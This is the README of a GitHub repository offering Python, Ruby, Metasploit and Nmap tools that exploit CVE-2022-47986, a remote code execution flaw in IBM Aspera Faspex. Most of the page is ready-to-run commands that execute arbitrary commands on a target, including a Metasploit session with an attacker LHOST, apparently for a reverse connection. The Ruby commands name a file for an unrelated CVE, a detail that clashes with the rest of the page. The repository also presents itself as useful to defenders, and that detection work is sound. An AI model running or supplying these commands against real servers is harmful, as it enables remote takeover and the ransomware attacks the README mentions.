Skip to content

CVE-2022-47986: Python, Ruby, NMAP and Metasploit modules to exploit the vulnerability.

License

Notifications You must be signed in to change notification settings

mauricelambert/CVE-2022-47986

Repository files navigation

CVE-2022-47986

Why

This vulnerability is exploited in the wild. IceFire use this vulnerability to deploy the ransomware on targeted systems, i would like to help SOC/Blue teams to identify impacted systems and Pentesters/Red teams to exploit and report it.

Description

I propose pure python and ruby scripts, metasploit and nmap modules to exploit the vulnerability that causes a RCE (Remote Code Execution) on IBM Aspera Faspex from YAML deserialization.

Exploit: RCE (Remote Code Execution)

Python

python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

Sources

Licence

Licensed under the GPL, version 3.